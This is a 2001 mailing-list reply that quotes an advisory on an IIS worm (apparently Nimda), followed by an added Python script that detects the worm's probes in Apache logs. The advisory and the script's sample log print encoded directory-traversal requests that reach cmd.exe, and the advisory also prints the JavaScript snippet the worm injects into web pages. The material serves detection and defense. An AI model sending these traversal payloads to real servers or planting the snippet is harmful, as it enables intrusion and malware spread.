On Wed, 2001-09-19 at 02:49, Valkai Elod wrote:
>
> Since 18 September the following have been showing up in the Apache logs:
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
>
> The requests come from outside, in bunches every two (2) seconds.
>
> So who is this one now???
Exodus Confidential Customer Communication
Date: September 18, 2001
Title: Security Advisory - IIS Worm
Summary:
Exodus, as a professional courtesy to its customers, is distributing this Security Threat Advisory. As many of you have probably experienced, there is a new and prolific worm propagating across the Internet. The worm appears to target a large number of well-known vulnerabilities in Microsoft Windows IIS 4 and IIS 5. In addition to targeting Microsoft IIS web servers, there is the potential that clients operating non-Microsoft sites will experience denial of service type effects as the worm scans for additional vulnerable hosts.
Proposed Remedy:
Microsoft patches are available at:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/default.asp
The worm appears to have a number of propagation methods. Infected hosts scan their associated Class "B" address space for additional victims; they also scan open network shares and may populate their served web pages with a snippet of Java code that induces some versions of Microsoft Outlook/Outlook Express to download the hostile executable "readme.exe". The code can also propagate via email with the hostile payload bearing the name "readme.exe".
An initial analysis of the worm by the Exodus Cyber Attack Team and others within the security community revealed the following details.
Victim sites initiate a tftp session with the infecting host and download "admin.dll". Once on the victim system, admin.dll performs a number of actions, including elevating the permissions of both the "guest" and "iuser" accounts to administrator and creating trojanized versions of a number of files, including:
c:\program files\outlook express\wabmig.exe
c:\program files\outlook express\wab.exe
c:\program files\windows nt\pinball\pinball.exe
c:\winnt\system32\mspaint.exe
c:\program files\outlook express\msimn.exe
c:\program files\internet explorer\connection wizard\isignup.exe
c:\program files\internet explorer\connection wizard\inetwiz.exe
c:\winnt\system32\inetsrv\inetmgr.exe
c:\program files\internet explorer\iexplore.exe
c:\program files\internet explorer\connection wizard\icwconn2.exe
c:\program files\internet explorer\connection wizard\icwconn1.exe
c:\program files\windows nt\dialer.exe
c:\program files\netmeeting\conf.exe
c:\winnt\system32\cmmgr32.exe
The Exodus CAT Team is in the process of analyzing these trojanized files, and additional details regarding these files will be distributed as they are discovered.
The worm also creates a file named "readme.eml". On at least one compromised system, the files appeared in the following directories:
c:\Inetpub\wwwroot
c:\Program Files\Common Files\System\ado
c:\Program Files\Microsoft Script Debugger
c:\Microsoft Script Debugger\NetMeeting
c:\Winnt\Help\debug
c:\Winnt\Help\iishelp
c:\Winnt\Help\iishelp\iis
c:\Winnt\system32\inetsrv\iisadmin
A number of websites are reporting the addition of the following snippet of code to their pages:
</body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
The readme.eml file appears to facilitate the downloading of the hostile code by older versions of Outlook and Outlook Express.
Until additional details about this worm are known, Exodus is recommending that any infected host be pulled off the network.
Sites operating Microsoft IIS web servers that have not yet been infected should be patched immediately through the most recent Microsoft Security Advisory.
All users in your enterprise should be apprised of the threat and notified of the potential risk associated with any attachments labeled "readme.exe".
A review of the IIS logs for a targeted server may display some or all of the following entries:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Should you have any questions, or need any assistance, please feel free to contact our Response Center at 1-877-393-7878.
Exodus does not guarantee or warrant that the information and recommendations set forth in this advisory will enable customers to stop the worm from propagating or operate a completely secure or error-free Internet site. Exodus makes no warranty or guarantee as to suitability or efficacy of any vendor supplied software patches.
Respectfully,
Exodus Communications, Inc.
"The Infrastructure for the Digital Economy"
Exodus Confidential Customer Communications
Web: <http://www.exodus.net>
--
Florin Andrei
"Our kernel does have source control: its name is
Linus Torvalds, CVS with a brain." - Nicholas Knight
---
Send e-mail to '[EMAIL PROTECTED]' with 'unsubscribe rlug' to
unsubscribe from this list.
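Added example (not part of the original post, nor of the Exodus advisory): a Python script that parses Apache combined-format access log lines like the ones quoted at the top of the thread and flags the probe requests the advisory lists, then counts them per client so a host hitting every two seconds stands out. The sample log lines are constructed for this example; the client addresses are documentation addresses. One assumption is worth stating: the "\xc1\x1c"-style entries in the advisory are what IIS writes to its log after decoding the request once, while the same probes arrive on the wire percent-encoded ("%c1%1c", "%255c", "%%35c", "%252f"), which is the form an Apache log records and the form the sample lines use. The canonicalize function models the two server-side behaviours the encoded variants depend on, a second round of percent-decoding and a lenient UTF-8 decoder that accepts overlong or malformed two-byte sequences, so every variant collapses to the same /winnt/system32/cmd.exe path. All function names are this example's own.

```python
"""Flag Nimda-style IIS probes in Apache combined-format logs (added example)."""
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log, not taken from the original post.  Hosts are
# documentation addresses; encoded probes are written as they cross the wire.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:10:01:02 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:01:04 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:01:06 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:01:08 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:01:10 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:01:12 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:01:14 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:01:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
198.51.100.7 - - [18/Sep/2001:10:02:00 +0300] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SUSPECT_BASENAMES = {"cmd.exe", "root.exe"}


def lenient_utf8(data: bytes) -> str:
    """Model the lenient decoder that let overlong sequences through.

    A two-byte lead (0xC0-0xDF) and whatever byte follows are combined as
    ((b1 & 0x1F) << 6) | (b2 & 0x3F) with no continuation-byte or
    shortest-form check, so %c0%af and %c0%2f both yield '/' and %c1%1c and
    %c1%9c both yield '\\'.  Python's strict bytes.decode("utf-8") would
    reject all four.
    """
    out, i = [], 0
    while i < len(data):
        lead = data[i]
        if 0xC0 <= lead <= 0xDF and i + 1 < len(data):
            out.append(chr(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(lead))
            i += 1
    return "".join(out)


def canonicalize(target: str) -> str:
    """Resolve a request target the way the vulnerable server would.

    Two rounds of percent-decoding reproduce the "superfluous decoding" flaw
    (%255c -> %5c -> '\\', %%35c -> %5c -> '\\'); lenient_utf8 handles the
    %c0/%c1 variants; backslashes then count as separators and '..' segments
    are resolved against the web root.
    """
    path = target.split("?", 1)[0].encode("latin-1")
    for _ in range(2):
        path = unquote_to_bytes(path)
    text = lenient_utf8(path).replace("\\", "/")
    return posixpath.normpath(text).lower()


def classify(target: str):
    """Label a request target as a probe, or return None if it looks ordinary."""
    path = canonicalize(target)
    if posixpath.basename(path) not in SUSPECT_BASENAMES:
        return None
    if ".." in target.split("?", 1)[0]:
        return "encoded traversal to " + path
    return "direct request for " + path


def scan(log_text: str):
    """Return (client host, label) for every probe line in the log."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match:
            label = classify(match["target"])
            if label is not None:
                hits.append((match["host"], label))
    return hits


def probes_per_host(log_text: str):
    """Count probes per client; a host hitting every two seconds stands out."""
    counts = {}
    for host, _ in scan(log_text):
        counts[host] = counts.get(host, 0) + 1
    return counts


if __name__ == "__main__":
    for host, label in scan(SAMPLE_LOG):
        print(host, label)
    print(probes_per_host(SAMPLE_LOG))
```

The point of canonicalizing before matching, rather than grepping for "cmd.exe", is that it also catches the variants where the traversal bytes differ but the resolved path is the same; the same canonicalize pass works on the once-decoded IIS-log form if the raw bytes are preserved, since lenient_utf8 accepts the bare 0xC1 0x1C pair as readily as its percent-encoded form.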